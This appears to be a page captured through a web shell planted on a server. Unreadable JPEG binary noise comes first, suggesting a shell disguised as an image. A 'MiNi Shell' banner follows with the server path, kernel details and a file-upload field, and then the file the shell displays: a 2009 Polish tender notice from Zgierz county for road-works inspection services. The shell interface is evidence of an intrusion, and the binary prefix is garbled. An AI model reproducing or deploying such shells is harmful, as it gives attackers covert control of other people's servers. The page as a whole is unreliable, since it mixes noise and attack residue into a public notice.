JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20091014/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20091014/359834-N-2009.html

<p class="kh_header"><b>Zgierz: Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Wykonanie nakładki na drodze powiatowej Nr 5173 E - Al. Wyszyńskiego w Ozorkowie, oraz nad zadaniem pn. Wykonanie nakładki na drodze powiatowej Nr 5101E- ul. Sikorskiego w Głownie - dwa zadania</b><br>
<b>Numer ogłoszenia: 359834 - 2009; data zamieszczenia: 14.10.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Zgierskiego , ul. Sadowa 6A, 95-100 Zgierz, woj. łódzkie, tel. 042 7190885, faks 042 7190816.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat.zgierz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem 
pn. Wykonanie nakładki na drodze powiatowej Nr 5173 E - Al. Wyszyńskiego w Ozorkowie, oraz nad zadaniem pn. Wykonanie nakładki na drodze powiatowej Nr 5101E- ul. Sikorskiego w Głownie - dwa zadania.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Temat: Pełnienie funkcji inspektora nadzoru nad zadaniem pn.  Wykonanie nakładki na drodze Nr 5173 E - Al. Wyszyńskiego w Ozorkowie,
Zamówień: 71521000-6 
Charakterystyka nadzorowanej inwestycji:
Przedmiotem zamówienia są roboty budowlane obejmujące wykonanie nakładki na drodze powiatowej Nr 5173 E- Al. Wyszyńskiego w Ozorkowie do zadania Przebudowa chodnika w drodze powiatowej nr 5173 E - Al. Wyszyńskiego w Ozorkowie., a w szczególności: 
1)wykonanie  i odbiór robót związanych z wykonywaniem warstw konstrukcji (warstwa ścieralna gr. 3,0 cm) nawierzchni   z betonu asfaltowego, na powierzchni 7707,00 m2,
2)wykonanie i odbiór robót związanych z oczyszczeniem i skropieniem warstw konstrukcyjnych nawierzchni na powierzchni 7707,00 m2,
3)wykonanie i odbiór robót związanych z wykonaniem regulacji pionowej studzienek dla urządzeń podziemnych,
4)wykonania  i odbioru robót związanych z wykonaniem wyrównania poprzecznego i podłużnego podbudowy mieszankami mineralno-asfaltowymi, w ilości 50 kg/m2
5)wykonanie i odbiór robót związanych z odtworzeniem trasy drogowej i jej punktów wysokościowych przy liniowych robotach ziemnych w pasie drogi powiatowej Nr 5173 E - Al. Wyszyńskiego w Ozorkowie,  na długości 0,592 km.
Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia opisanego w pkt. 2.1. zawarte są w Ogólnych Specyfikacjach Technicznych stanowiących załącznik nr 9 do SIWZ i Szczegółowych Specyfikacjach Technicznych stanowiących załącznik nr 10 do SIWZ wymienionych poniżej:
Ogólnych Specyfikacjach Technicznych:
1)WYMAGANIA OGÓLNE
2)ROBOTY PRZYGOTOWAWCZE
3)REGULACJA   PIONOWA   USZKODZONEJ STUDZIENKI  KANALIZACYJNEJ
4)OCZYSZCZENIE  I  SKROPIENIE WARSTW  KONSTRUKCYJNYCH
5)NAWIERZCHNIA  Z  BETONU  ASFALTOWEGO
Szczegółowych Specyfikacjach technicznych:
1)NAWIERZCHNIA  Z  BETONU  ASFALTOWEGO
2)OCZYSZCZENIE  I  SKROPIENIE WARSTW  KONSTRUKCYJNYCH
3)REGULACJA   PIONOWA   USZKODZONEJ STUDZIENKI   KANALIZACYJNEJ
4)WYRÓWNANIE PODBUDOWY MIESZANKAMI MINERALNO-ASFALTOWYMI
5)ODTWORZENIE  TRASY I  PUNKTÓW  WYSOKOŚCIOWYCH
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi Znak postępowania OR.343-93/09, lub w siedzibie Zamawiającego pok. 307,309
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
1.Wykonawca zobowiązany jest do: 
1) udziału w czynnościach przekazania wykonawcy Inwestycji terenu inwestorskich;
2) Zakres podstawowych obowiązków i praw inspektora nadzoru wynika  z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U. z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
a)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją postępowania,
 obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
b)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
c)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
d)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
e)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział w czynnościach odbioru robót,
f)potwierdzanie ilości wykonanych robót,
g)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
h)sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
i)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
j)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
k)udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.
l)Zamawiający wymaga, aby Wykonawca był przedsiębiorcą  w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
m)Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
n)Zleceniobiorca ponosi odpowiedzialność za szkody wyrządzone na skutek nie wykonania lub nienależytego wykonania czynności objętych umową, ocenianego w granicach przewidzianych dla umów starannego działania.
2.Termin realizacji inwestycji 14 dni od dnia przekazania terenu.
3.Okres gwarancji na wykonane prace 24 miesiące. 
Temat: Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Wykonanie nakładki na drodze powiatowej Nr 5101 E  - ul. Sikorskiego w Głownie Wspólny Słownik Zamówień:  71521000-6
Charakterystyka nadzorowanej inwestycji:
Przedmiotem zamówienia są roboty budowlane obejmujące Wykonanie nakładki na drodze powiatowej Nr 5101 E - ul. Sikorskiego w Głownie do zadania Przebudowa chodnika w drodze powiatowej Nr 5101 E- ul. Sikorskiego w Głownie, a w szczególności: 
1)wykonywanie warstw konstrukcji (warstwa ścieralna gr. 5,00 cm) nawierzchni  z betonu asfaltowego, na powierzchni 4040,0 m2, 
2)wykonanie  i odbiór robót związanych z oczyszczeniem i skropieniem warstw konstrukcyjnych nawierzchni na powierzchni 4040,00 m2, 
3)wykonanie i odbiór robót związanych z wykonaniem regulacji pionowej studzienek dla urządzeń podziemnych w pasie drogowym,
4)wykonanie i odbiór robót związanych z odtworzeniem trasy drogowej i jej punktów wysokościowych przy liniowych robotach ziemnych.
Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia opisanego w pkt. 2.1. zawarte są w Ogólnych Specyfikacjach Technicznych stanowiących załącznik nr 9 do SIWZ i Szczegółowych Specyfikacjach Technicznych stanowiących załącznik nr 10 do SIWZ wymienionych poniżej:
Ogólnych Specyfikacjach Technicznych:
6)WYMAGANIA OGÓLNE
7)ROBOTY PRZYGOTOWAWCZE
8)REGULACJA   PIONOWA   USZKODZONEJ STUDZIENKI  KANALIZACYJNEJ
9)OCZYSZCZENIE  I  SKROPIENIE WARSTW  KONSTRUKCYJNYCH
10)NAWIERZCHNIA  Z  BETONU  ASFALTOWEGO
Szczegółowych Specyfikacjach technicznych:
6)NAWIERZCHNIA  Z  BETONU  ASFALTOWEGO
7)OCZYSZCZENIE  I  SKROPIENIE WARSTW  KONSTRUKCYJNYCH
8)REGULACJA   PIONOWA   USZKODZONEJ STUDZIENKI   KANALIZACYJNEJ
9)ODTWORZENIE  TRASY I  PUNKTÓW  WYSOKOŚCIOWYCH
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi Znak postępowania OR.343-94/09, lub w siedzibie Zamawiającego pok. 307,309
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
1.Wykonawca zobowiązany jest do: 
1) udziału w czynnościach przekazania wykonawcy Inwestycji terenu inwestorskich;
2) Zakres podstawowych obowiązków i praw inspektora nadzoru wynika  z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U. z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
a)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją postępowania,
 obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
b)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
c)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
d)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
e)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział  w czynnościach odbioru robót,
f)potwierdzanie ilości wykonanych robót,
g)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
h)sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
i)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
j)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
k)udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.
l)Zamawiający wymaga, aby Wykonawca był przedsiębiorcą  w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
m)Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
n)Zleceniobiorca ponosi odpowiedzialność za szkody wyrządzone na skutek nie wykonania lub nienależytego wykonania czynności objętych umową, ocenianego w granicach przewidzianych dla umów starannego działania.
2.Termin realizacji inwestycji 14 dni od dnia przekazania terenu .
3.Okres gwarancji na wykonane prace 24 miesiące..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Zamawiający nie żada wniesienia wadium<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W postępowaniu mogą wziąć udział Wykonawcy nie wykluczeni na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo Zamówień Publicznych (Dz. U. z 2007 r. Nr 223, poz. 1655, z późn. zm.), oraz spełniający warunki i wymagania określone w Specyfikacji Istotnych Warunków Zamówienia oraz w art. 22 ustawy Prawo Zamówień Publicznych.
O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełnią poniższe warunki udziału w postępowaniu:
4.1. Posiadają uprawnienie do wykonywania określonej działalności  lub czynności  jeżeli ustawy nakładają obowiązek posiadania takich uprawnień i są uprawnienie do prowadzenia działalności  gospodarczej zgodnie z art. 14 ust. 1 ustawy z dnia 2 lipca 2004 r. o swobodzie działalności gospodarczej ( Dz. U. z 2007 r. Nr 155, poz. 1095 )  
4.2.	Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia: 
1) Wykonawca w okresie ostatnich 3 latach przed wszczęciem postępowania, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie - zrealizował co najmniej 2 zamówienia polegające na wykonaniu funkcji inspektora nadzoru robót drogowych o wartości minimum: 
a)	dla zadania Nr 1 -  11.000 zł brutto - każda,
b)	 dla zadania Nr 2 -  5.000 zł brutto - każda,
2) Wykonawca dysponuje min jedną osobą która będzie wykonywać zamówienie, posiadającą uprawnienia do nadzorowania  i kierowania robotami budowlanymi w specjalności konstrukcyjno-inżynieryjnej w zakresie budowy dróg (zgodnie z art. 12 ust. 1 i 2 ustawy - Prawo budowlane) wystawione przez podmioty uprawnione  oraz posiada aktualne zaświadczenie  o przynależności do Okręgowej Izby Inżynierów Budowlanych.
4.3. Znajdują się w sytuacji ekonomicznej 
i finansowej zapewniającej wykonanie zamówienia.
4.4. Nie podlegają wykluczeniu z postępowania.
Ocena spełnienia warunków udziału w Postępowaniu zostanie dokonana metodą spełnia/nie spełnia na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń składających się na ofertę, wg wymogów zawartych w pkt 10 SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Wykaz oświadczeń i dokumentów, jakie mają dostarczyć Wykonawcy w celu potwierdzenia spełniania warunków:
4.1.1.  Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert*.
4.1.2.  Oświadczenie o spełnianiu warunków udziału 
w postępowaniu (Zał. Nr 3)**.
* - Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast przedmiotowych dokumentów, składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono jego upadłości,
b)	nie zalega z uiszczaniem podatków, opłat oraz składek na ubezpieczenie społeczne lub zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie.
Dokumenty, o których mowa w a i c., powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, lit. b nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Jeżeli             w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
** Oświadczenie o spełnianiu warunków udziału w postępowaniu - wykonawca składa tylko jedno oświadczenie na potwierdzenie każdego warunku..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.starostwo.zgierz.pl/przetargi.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SIWZ (cena 10,20 zł) można odebrać w siedzibie Zamawiającego w Starostwie Powiatowym w Zgierzu przy ul. Sadowej 6A.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.10.2009 godzina 12:00, miejsce: Oferty należy składać w Starostwie Powiatowym w Zgierzu; 95-100 Zgierz, ul. Sadowa 6A w pok. 112 - Kancelaria.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 5.5.1. Od dnia przekazania Wykonawcy robót budowlanych terenu budowy.
 Do dnia zakończenia i odbioru wszystkich robót objętych przedmiotem zamówienia oraz przekazania do użytkowania nadzorowanych inwestycji oraz w okresie trwania gwarancji 
tj. 24 miesięcy licząc od dnia następującego po dniu ostatecznego odbioru ostatniej oddanej do odbioru roboty budowlanej objętej nadzorem inwestorskim.
. - dla zadania częściowego: 1
5.5.2. Od dnia przekazania Wykonawcy robót budowlanych terenu budowy.
Do dnia zakończenia i odbioru wszystkich robót objętych przedmiotem zamówienia oraz przekazania do użytkowania nadzorowanych inwestycji oraz w okresie trwania gwarancji 
tj. 24  miesięcy licząc od dnia następującego po dniu ostatecznego odbioru ostatniej oddanej do odbioru roboty budowlanej objętej nadzorem inwestorskim.
. - dla zadania częściowego: 2.</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem pn.  Wykonanie nakładki na drodze Nr 5173 E - Al. Wyszyńskiego w Ozorkowie,.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem pn.  Wykonanie nakładki na drodze Nr 5173 E - Al. Wyszyńskiego w Ozorkowie,
Zamówień: 71521000-6 
Charakterystyka nadzorowanej inwestycji:
Przedmiotem zamówienia są roboty budowlane obejmujące wykonanie nakładki na drodze powiatowej Nr 5173 E- Al. Wyszyńskiego w Ozorkowie do zadania Przebudowa chodnika w drodze powiatowej nr 5173 E - Al. Wyszyńskiego w Ozorkowie., a w szczególności: 
1)wykonanie  i odbiór robót związanych z wykonywaniem warstw konstrukcji (warstwa ścieralna gr. 3,0 cm) nawierzchni    z betonu asfaltowego, na powierzchni 7707,00 m2,
2)wykonanie i odbiór robót związanych z oczyszczeniem i skropieniem warstw konstrukcyjnych nawierzchni na powierzchni 7707,00 m2,
3)wykonanie i odbiór robót związanych z wykonaniem regulacji pionowej studzienek dla urządzeń podziemnych,
4)wykonania  i odbioru robót związanych z wykonaniem wyrównania poprzecznego i podłużnego podbudowy mieszankami mineralno-asfaltowymi, w ilości 50 kg/m2
5)wykonanie i odbiór robót związanych z odtworzeniem trasy drogowej i jej punktów wysokościowych przy liniowych robotach ziemnych w pasie drogi powiatowej Nr 5173 E - Al. Wyszyńskiego w Ozorkowie,  na długości 0,592 km.
Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia opisanego w pkt. 2.1. zawarte są w Ogólnych Specyfikacjach Technicznych stanowiących załącznik nr 9 do SIWZ i Szczegółowych Specyfikacjach Technicznych stanowiących załącznik nr 10 do SIWZ wymienionych poniżej:
Ogólnych Specyfikacjach Technicznych:
1)WYMAGANIA OGÓLNE
2)ROBOTY PRZYGOTOWAWCZE
3)REGULACJA   PIONOWA   USZKODZONEJ STUDZIENKI  KANALIZACYJNEJ
4)OCZYSZCZENIE  I  SKROPIENIE WARSTW  KONSTRUKCYJNYCH
5)NAWIERZCHNIA  Z  BETONU  ASFALTOWEGO
Szczegółowych Specyfikacjach technicznych:
1)NAWIERZCHNIA  Z  BETONU  ASFALTOWEGO
2)OCZYSZCZENIE  I  SKROPIENIE WARSTW  KONSTRUKCYJNYCH
3)REGULACJA   PIONOWA   USZKODZONEJ STUDZIENKI   KANALIZACYJNEJ
4)WYRÓWNANIE PODBUDOWY MIESZANKAMI MINERALNO-ASFALTOWYMI
5)ODTWORZENIE  TRASY I  PUNKTÓW  WYSOKOŚCIOWYCH
Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi Znak postępowania OR.343-93/09, lub w siedzibie Zamawiającego pok. 307,309
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
1.Wykonawca zobowiązany jest do: 
1) udziału w czynnościach przekazania wykonawcy Inwestycji terenu inwestorskich;
2) Zakres podstawowych obowiązków i praw inspektora nadzoru wynika  z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U. z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
a)reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją postępowania,
 obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
